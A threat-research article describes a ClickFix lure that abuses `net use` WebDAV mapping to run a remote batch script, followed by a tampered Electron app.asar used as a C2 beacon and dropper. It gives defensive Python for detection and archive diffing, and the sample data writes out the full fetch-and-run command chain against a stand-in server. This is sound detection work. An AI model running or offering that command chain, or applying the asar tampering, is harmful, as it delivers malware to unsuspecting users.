Atos Threat Research Center has identified a new variant of the ClickFix social engineering technique, a notable evolution of a persistent threat. The core deception is unchanged: victims are lured to a fraudulent page, typically styled as a CAPTCHA check, that instructs them to paste and run a command in the Windows Run dialog (Win+R). What changes is the execution chain. Instead of the PowerShell or `mshta.exe` invocations that defenders now watch closely, the pasted command uses `net use` to map a WebDAV share on an attacker-controlled server as a local drive letter (for example Z:), runs a batch script (`update.cmd`) from that drive, and then deletes the mapping to remove the obvious trace. When such a chained line is run from the Run dialog it has to go through `cmd /c`, and a batch file invoked that way executes inside that same `cmd.exe` instance, so a defender should expect the whole sequence in one process's command line rather than in a separate script-host process. Two practical caveats: WebDAV mapping depends on the WebClient service, which is present on Windows client editions and normally starts on demand, and the Windows redirector falls back to WebDAV when SMB to a host fails, so an apparently plain UNC path pointing at an internet host is not harmless either. Leaning on a built-in administrative command for initial access is a deliberate move away from the scripting engines that many controls are tuned to.
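The chain described above can be caught from process-creation telemetry alone. The following Python is an added example, not code from Atos or from the campaign write-up, that runs the correlation over a handful of constructed Sysmon-style events (the events, user names, drive letter and the 203.0.113.10 address are sample data): it splits each `cmd.exe` command line on its chaining operators, tracks which drive letters each user has mapped and to what, flags mappings whose target uses WebDAV syntax, flags a script run from such a drive, and flags the complete map-execute-delete sequence.

```python
import re
from collections import defaultdict

# Constructed process-creation events in the shape Sysmon Event ID 1 or EDR telemetry
# takes after parsing. Sample data for this example only; not telemetry from the
# campaign. 203.0.113.10 is a documentation-range address standing in for the server.
SAMPLE_EVENTS = [
    # Win+R: explorer.exe starts cmd.exe with the whole pasted chain on one command line.
    # The batch file runs inside this cmd.exe, so there is no separate "update.cmd" process.
    {"ts": 100, "user": "CORP\\alice", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c net use Z: \\\\203.0.113.10@80\\DavWWWRoot\\pub & '
                'Z:\\update.cmd & net use Z: /delete /y'},
    # net.exe delegates to net1.exe, so the mapping shows up twice more as child processes.
    {"ts": 101, "user": "CORP\\alice", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": 'net use Z: \\\\203.0.113.10@80\\DavWWWRoot\\pub'},
    {"ts": 101, "user": "CORP\\alice", "parent": "C:\\Windows\\System32\\net.exe",
     "image": "C:\\Windows\\System32\\net1.exe",
     "cmdline": 'C:\\Windows\\system32\\net1 use Z: \\\\203.0.113.10@80\\DavWWWRoot\\pub'},
    {"ts": 103, "user": "CORP\\alice", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\net.exe", "cmdline": 'net use Z: /delete /y'},
    # Benign: an internal file server is mapped and nothing is executed from it.
    {"ts": 200, "user": "CORP\\bob", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": 'net use H: \\\\fileserver01\\home /persistent:yes'},
]

# "net use X: <target>" where the target is a UNC path or a URL (net1.exe is net.exe's helper).
NET_USE_MAP = re.compile(
    r"\bnet1?(?:\.exe)?\s+use\s+(?P<drive>[a-z]):\s+(?P<target>(?:\\\\|https?://)\S+)", re.I)
# "net use X: /delete": the cleanup step.
NET_USE_DEL = re.compile(r"\bnet1?(?:\.exe)?\s+use\s+(?P<drive>[a-z]):\s+/del(?:ete)?\b", re.I)
# WebDAV redirector syntax (\\host@port\DavWWWRoot\..., \\host@SSL\...) or a bare URL.
WEBDAV_HINT = re.compile(r"\\\\[^\\\s]+@(?:\d+|ssl)\b|davwwwroot|https?://", re.I)
# A script or binary referenced by drive letter, e.g. Z:\update.cmd.
RUN_FROM_DRIVE = re.compile(
    r'(?<![\w\\])(?P<drive>[a-z]):\\[^\s"&|]*\.(?:cmd|bat|exe|vbs|js|ps1)\b', re.I)


def segments(cmdline):
    """Split a cmd.exe command line on its chaining operators (&, &&, |, ||)."""
    return [s.strip() for s in re.split(r"&&|\|\||[&|]", cmdline) if s.strip()]


def detect_net_use_chain(events):
    """Correlate drive mappings, execution from the mapped drive and the /delete cleanup
    per user across process-creation events. Returns a list of alert dicts."""
    mapped = defaultdict(dict)  # user -> drive letter -> {"target", "webdav", "ran"}
    alerts, seen = [], set()

    def emit(kind, ev, drive, **extra):
        key = (kind, ev["user"], drive, extra.get("target"), extra.get("script"))
        if key not in seen:  # the same mapping is visible in cmd.exe, net.exe and net1.exe
            seen.add(key)
            alerts.append({"kind": kind, "ts": ev["ts"], "user": ev["user"],
                           "drive": drive, **extra})

    for ev in sorted(events, key=lambda e: e["ts"]):
        user = ev["user"]
        from_run_dialog = ev["parent"].lower().endswith("\\explorer.exe")
        for seg in segments(ev["cmdline"]):
            m = NET_USE_MAP.search(seg)
            if m:
                drive, target = m["drive"].upper(), m["target"]
                state = mapped[user].get(drive)
                if not state or state["target"].lower() != target.lower():
                    state = mapped[user][drive] = {
                        "target": target, "webdav": bool(WEBDAV_HINT.search(target)), "ran": []}
                if state["webdav"]:
                    emit("map_remote_webdav", ev, drive, target=target,
                         run_dialog=from_run_dialog)
                continue
            m = NET_USE_DEL.search(seg)
            if m:
                state = mapped[user].pop(m["drive"].upper(), None)
                if state and state["ran"]:
                    emit("map_exec_delete_chain", ev, m["drive"].upper(),
                         target=state["target"], script=state["ran"][0])
                continue
            for m in RUN_FROM_DRIVE.finditer(seg):
                state = mapped[user].get(m["drive"].upper())
                if state:
                    state["ran"].append(m.group(0))
                    if state["webdav"]:
                        emit("exec_from_webdav_drive", ev, m["drive"].upper(),
                             target=state["target"], script=m.group(0))
    return alerts


if __name__ == "__main__":
    for alert in detect_net_use_chain(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample, the benign mapping by `bob` produces nothing, while `alice`'s single `cmd.exe` event yields all three alerts, with `run_dialog` set because the parent is `explorer.exe`. The duplicate mappings reported by `net.exe` and `net1.exe` are collapsed by the `seen` set. In production the WebDAV hint would be extended with an internal-host allowlist so that a plain UNC path to an internet host, which the redirector will also retry over WebDAV, is scored as well.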
The infection chain then continues from the batch file. `update.cmd` is a downloader: it fetches a ZIP archive from the internet and unpacks it. The archive carries a copy of the legitimate WorkFlowy note-taking application whose `.asar` archive has been modified. WorkFlowy is an Electron application, and Electron ships an app's JavaScript, HTML and assets in a single `app.asar` file alongside the signed executable; the framework reads that archive at startup and runs the entry point it names. By inserting code into the archive, the attackers get their code executed every time the user starts what looks like the genuine application, before or alongside its normal logic. The camouflage works because the executable itself is untouched: its Authenticode signature still verifies, and the process name, icon and window are those of a trusted product. The technique is sometimes lumped in with "living off the land", but it is more precisely application tampering: the signed host binary acts as the loader and the modified archive is the payload. Electron does offer an opt-in ASAR integrity check, enabled through a build-time fuse, that validates the archive header's hash at startup; unless the vendor turned it on, nothing on the endpoint verifies that `app.asar` matches what was shipped.
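To check whether an installed Electron application's archive still matches what the vendor shipped, one can parse the `.asar` header and hash every packed file against a clean copy. The Python below is an added example, not Atos' tooling and not WorkFlowy code. The layout it reads (an 8-byte size pickle, a pickle holding the JSON header, then file bodies whose offsets are relative to the end of the header) is the documented asar format; the `build_asar` helper and the two file sets are constructed only so the example runs offline, and the injected `update.js` stand-in is a placeholder rather than the campaign's code. A real baseline is the archive taken from a freshly downloaded installer.

```python
import hashlib
import json
import struct

# Constructed file sets standing in for a clean and a tampered Electron app.asar. The
# contents are placeholders for this example, not WorkFlowy's code or the campaign's
# injected code.
CLEAN_FILES = {
    "package.json": b'{"name":"example-app","main":"main.js"}',
    "main.js": b"const { app } = require('electron');\nrequire('./app/index');\n",
    "app/index.js": b"module.exports = function start() {};\n",
}
TAMPERED_FILES = dict(CLEAN_FILES)
TAMPERED_FILES["main.js"] = b"require('./update');\n" + CLEAN_FILES["main.js"]
TAMPERED_FILES["update.js"] = b"// placeholder for injected code\n"


def build_asar(files):
    """Pack {path: bytes} into the asar layout: an 8-byte size pickle, a pickle holding the
    JSON header, then the file bodies back to back. Used here only to create test input."""
    header = {"files": {}}
    bodies = bytearray()
    for path, content in files.items():
        node = header["files"]
        parts = path.split("/")
        for directory in parts[:-1]:
            node = node.setdefault(directory, {"files": {}})["files"]
        node[parts[-1]] = {"size": len(content), "offset": str(len(bodies))}
        bodies += content
    raw = json.dumps(header).encode()
    padded = raw + b"\0" * (-len(raw) % 4)            # pickle strings are 4-byte aligned
    header_pickle = struct.pack("<II", 4 + len(padded), len(raw)) + padded
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return bytes(size_pickle + header_pickle + bodies)


def parse_asar(data):
    """Read the asar header and return {path: (absolute_offset, size)} for packed files;
    entries stored outside the archive (unpacked) or symlinks map to None."""
    size_payload, header_len = struct.unpack_from("<II", data, 0)
    if size_payload != 4 or len(data) < 8 + header_len:
        raise ValueError("not an asar archive")
    _, json_len = struct.unpack_from("<II", data, 8)
    header = json.loads(data[16:16 + json_len])
    base = 8 + header_len                             # file offsets are relative to here
    entries = {}

    def walk(node, prefix):
        for name, entry in node["files"].items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:
                walk(entry, path)
            elif entry.get("unpacked") or "link" in entry:
                entries[path] = None
            else:
                entries[path] = (base + int(entry["offset"]), int(entry["size"]))

    walk(header, "")
    return entries


def hash_entries(data):
    """SHA-256 of every packed file, keyed by its path inside the archive."""
    digests = {}
    for path, loc in parse_asar(data).items():
        if loc is not None:
            off, size = loc
            digests[path] = hashlib.sha256(data[off:off + size]).hexdigest()
    return digests


def diff_asar(baseline, suspect):
    """Compare a known-good archive with a suspect one. Returns added, removed and
    modified paths; any non-empty list means the archive is not what the vendor shipped."""
    good, bad = hash_entries(baseline), hash_entries(suspect)
    return {
        "added": sorted(set(bad) - set(good)),
        "removed": sorted(set(good) - set(bad)),
        "modified": sorted(p for p in good.keys() & bad.keys() if good[p] != bad[p]),
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                            # python asar_diff.py clean.asar suspect.asar
        with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as g:
            print(diff_asar(f.read(), g.read()))
    else:
        print(diff_asar(build_asar(CLEAN_FILES), build_asar(TAMPERED_FILES)))
```

On the constructed input the diff reports `main.js` as modified and `update.js` as added, which is exactly the signal a hunt would look for across a fleet: hash the `resources/app.asar` of every install and compare against the vendor build rather than trusting the executable's signature alone. Files marked `unpacked` live beside the archive in `app.asar.unpacked` and need to be hashed from disk separately.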
The code embedded in the WorkFlowy application serves two purposes. It is first a command-and-control (C2) beacon that contacts the attackers' infrastructure for instructions, which also gives the implant persistence for as long as the user keeps launching the app. It is second a dropper, responsible for retrieving and installing the final-stage payload on the compromised system. That final payload is not fixed: a remote access trojan (RAT), an information stealer or ransomware are all plausible, depending on the operators' objectives. The staging, and the fact that every stage up to the last runs under the name of a legitimate product, complicates detection for antivirus and endpoint products that check the signed executable but do not inspect the contents of the Electron archive it loads.
This campaign, hosted on the domain "happyglamper[.]ro", illustrates the continuing refinement of social engineering lures paired with execution paths chosen for their opacity. Neither `net use` nor batch scripts are new, but their combination in a ClickFix lure is a new set of Tactics, Techniques and Procedures (TTPs) for this family, and it shows how quickly operators adapt once defenders have caught up with the previous iteration. For security teams it reinforces the case for defense in depth: user awareness training that specifically covers "paste this into Run" lures; endpoint detection that baselines what trusted applications normally do and alerts on departures from it, such as a note-taking app starting a new outbound beacon; and network controls aimed at the specific path used here. On that last point, the Windows WebDAV client speaks ordinary HTTP with the `Microsoft-WebDAV-MiniRedir` user agent, so it can be identified at a proxy and blocked toward untrusted destinations, and where users have no legitimate need for WebDAV the WebClient service can be disabled outright, which removes the `net use` mapping step entirely.